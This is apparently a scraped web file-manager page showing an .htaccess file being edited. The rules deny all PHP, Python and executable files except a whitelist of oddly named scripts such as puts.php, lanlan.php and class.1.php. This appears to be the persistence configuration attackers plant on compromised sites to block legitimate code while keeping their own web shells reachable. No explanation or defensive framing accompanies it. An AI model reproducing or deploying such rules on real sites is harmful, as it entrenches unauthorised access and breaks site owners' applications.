Edit file File name : .htaccess Content :<FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "(^puts.php|^locale.php|^class.1.php|^index.php|^tags.php|^lanlan.php|^async.php)$"> Order allow,deny Allow from all </FilesMatch> Save